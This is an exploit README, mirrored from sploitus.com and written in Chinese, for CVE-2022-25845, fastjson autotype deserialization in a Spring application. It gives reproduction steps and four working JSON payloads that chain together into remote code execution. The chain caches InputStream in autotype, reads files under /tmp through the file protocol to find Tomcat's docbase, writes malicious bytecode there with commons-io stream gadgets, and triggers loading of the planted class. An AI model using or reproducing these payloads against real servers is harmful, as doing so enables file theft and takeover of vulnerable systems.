Share
## https://sploitus.com/exploit?id=307C3200-FE5B-5EB0-AA07-6048A1193D91
# CVE-2022-25845-In-Spring
# 主要依赖
1. jackson
2. commons-io
# 快速复现
1. idea导入项目 build ```mvn install```
2. Dockerfile build && run ```docker build .```
3. 运行src/test/java/POC.java 执行touch /tmp/pwned命令
# 利用说明
## Step1: 把java.io.InputStream 加入 fastjson autotype 缓存
```json
{
"a": "{ \"@type\": \"java.lang.Exception\", \"@type\": \"com.fasterxml.jackson.core.exc.InputCoercionException\", \"p\": { } }",
"b": {
"$ref": "$.a.a"
},
"c": "{ \"@type\": \"com.fasterxml.jackson.core.JsonParser\", \"@type\": \"com.fasterxml.jackson.core.json.UTF8StreamJsonParser\", \"in\": {}}",
"d": {
"$ref": "$.c.c"
}
}
```
![截屏2024-11-07 21.36.27](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.36.27.png)
## Step2: file协议读取/tmp内容,获取tomcat的docbase文件名称
> 逐字节读取内容
```json
{
"a": {
"@type": "java.io.InputStream",
"@type": "org.apache.commons.io.input.BOMInputStream",
"delegate": {
"@type": "org.apache.commons.io.input.BOMInputStream",
"delegate": {
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "jdk.nashorn.api.scripting.URLReader",
"url": "${file}"
},
"charsetName": "UTF-8",
"bufferSize": "1024"
},
"boms": [
{
"charsetName": "UTF-8",
"bytes": ${data}
}
]
},
"boms": [
{
"charsetName": "UTF-8",
"bytes": [1]
}
]
},
"b": {"$ref":"$.a.delegate"}
}
```
![截屏2024-11-07 21.35.56](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.56.png)
## Step3: 写入恶意字节码到docbase目录下
```json
{
"a": {
"@type": "java.io.InputStream",
"@type": "org.apache.commons.io.input.AutoCloseInputStream",
"in": {
"@type": "org.apache.commons.io.input.TeeInputStream",
"input": {
"@type": "org.apache.commons.io.input.CharSequenceInputStream",
"cs": {
"@type": "java.lang.String"
"${shellcode}",
"charset": "iso-8859-1",
"bufferSize": ${size}
},
"branch": {
"@type": "org.apache.commons.io.output.WriterOutputStream",
"writer": {
"@type": "org.apache.commons.io.output.LockableFileWriter",
"file": "${file2write}",
"charset": "iso-8859-1",
"append": true
},
"charset": "iso-8859-1",
"bufferSize": 1024,
"writeImmediately": true
},
"closeBranch": true
}
},
"b": {
"@type": "java.io.InputStream",
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "org.apache.commons.io.input.XmlStreamReader",
"inputStream": {
"$ref": "$.a"
},
"httpContentType": "text/xml",
"lenient": false,
"defaultEncoding": "iso-8859-1"
},
"charsetName": "iso-8859-1",
"bufferSize": 1024
},
"c": {}
}
```
![截屏2024-11-07 21.37.04](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.37.04.png)
## Step4: 触发恶意类加载
```json
{
"@type":"java.lang.Exception",
"@type":"com.chenzai.HackException"
}
```
![截屏2024-11-07 21.35.32](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.32.png)
# 参考/致谢
- [GeekCon 2024](https://www.geekcon.top/js/pdfjs/web/viewer.html?file=/doc/ppt/GC24_SpringBoot之殇.pdf)
- jsjcw